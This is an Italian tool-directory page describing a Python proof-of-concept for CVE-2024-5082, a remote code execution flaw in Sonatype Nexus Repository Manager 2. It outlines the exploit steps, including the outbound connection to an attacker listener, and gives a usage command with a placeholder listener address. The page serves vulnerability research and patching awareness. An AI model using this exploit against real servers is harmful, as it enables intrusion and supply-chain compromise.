Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-5082 — Sonatype Nexus 2 - POC RCE Autorizzato | Kitploit
Strumenti/GitHubGitHub/h4mr3r/cve-2024-5082
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingSicurezza della Supply ChainSviluppo Payload
GitHubh4mr3r/cve-2024-5082

CVE-2024-5082

Sonatype Nexus 2 - POC RCE Autorizzato

Vedi Repository
11 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Panoramica

Questo repository contiene un proof of concept in Python per CVE-2024-5082, una vulnerabilità di esecuzione remota di codice in Sonatype Nexus Repository Manager 2.

La vulnerabilità consente a un utente con permessi sufficienti di pubblicare un artefatto Maven appositamente creato e contrassegnarlo per l'elaborazione da parte del generatore di contenuti Velocity. Quando l'artefatto viene recuperato, il template Velocity incorporato viene valutato da Nexus e può eseguire un comando nel contesto di sicurezza della JVM di Nexus.

Secondo Sonatype:

  • le versioni interessate includono Nexus Repository Manager 2.x fino a 2.15.1 inclusa;
  • il problema è stato risolto in 2.15.2;
  • Nexus Repository 2 ha raggiunto la fine del ciclo di vita il 30 giugno 2025 e dovrebbe essere migrato a Nexus Repository 3.

Chiarimento importante sull'ambito

Il comando viene eseguito sull'host di Nexus Repository.

Scaricare l'artefatto interessato da un server di build, un server applicativo o una workstation di sviluppo non esegue di per sé il comando incorporato su quel sistema consumatore. Tuttavia, il compromesso di un repository manager può creare un rischio più ampio per la supply chain se un attaccante successivamente modifica artefatti fidati, input di build, credenziali o configurazione del repository.

Come funziona il PoC

Lo script:

  1. Genera un percorso marker univoco sotto un namespace in stile Maven.
  2. Carica un file maven-metadata.xml appositamente creato in un repository hosted selezionato.
  3. Aggiorna gli attributi Nexus corrispondenti in modo che il generatore di contenuti sia impostato su velocity.
  4. Recupera l'artefatto caricato, causando l'elaborazione del template da parte di Nexus.
  5. Tenta di rimuovere l'artefatto marker caricato durante la pulizia.

Il payload fornito crea una connessione TCP in uscita dall'host Nexus all'indirizzo del listener configurato.

Autenticazione e permessi

Lo script attuale utilizza l'autenticazione HTTP Basic e richiede:

  • un nome utente e una password Nexus validi;
  • permesso di creare o aggiornare contenuti nel repository selezionato;
  • permesso per l'aggiornamento degli attributi utilizzato dal PoC.

Utilizzo

root@kitploit:~
python3 cve_2024_5082.py \\
  --base-url https://nexus.example.test/nexus \\
  --repository security-test-snapshots \\
  --username test-user \\
  --password 'REDACTED' \\
  --lhost LISTENER_IP \\
  --lport 8000
Scarica lo strumento